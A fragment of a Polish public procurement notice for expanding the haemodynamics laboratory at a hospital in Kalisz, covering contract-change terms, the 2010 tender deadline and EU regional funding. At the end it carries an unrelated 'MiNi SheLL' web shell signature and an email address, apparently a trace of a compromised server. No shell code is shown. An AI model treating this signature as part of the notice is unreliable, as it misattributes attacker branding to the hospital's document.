<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień przyszłej umowy w stosunku do treści oferty, na podstawie której dokonany będzie wybór Wykonawcy, w sytuacji konieczności wprowadzenia takiej zmiany wynikającej z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj: dopuszcza się zmianę osoby, wyznaczonej w § 7 ust. 2 projektu umowy, do 
pełnienia funkcji kierownika budowy (przedstawionej w ofercie w Wykazie osób ...) na wniosek Wykonawcy w przypadku uzasadnionej konieczności takiej zmiany (np.: w przypadku zdarzenia losowego, nie wywiązywania się osoby z obowiązków wynikających z powierzonej jej funkcji).
Określenie warunków dokonania w/wym. zmiany do umowy: strona wnosząca o zmianę inicjuje zmianę pisemnie podając uzasadnienie zmiany oraz przedstawia propozycję aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego - Dział Zamówień Publicznych (kondygnacja III - pokój nr 16).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2010 godzina 09:00, miejsce: Kancelaria Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Rozbudowa Pracowni Hemodynamiki w Wojewódzkim Szpitalu Zespolonym im. Ludwika Perzyny w Kaliszu w ramach: Priorytetu V - Infrastruktura dla kapitału ludzkiego Działania 5.3 - Poprawa warunków funkcjonowania systemu ochrony zdrowia w województwie Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com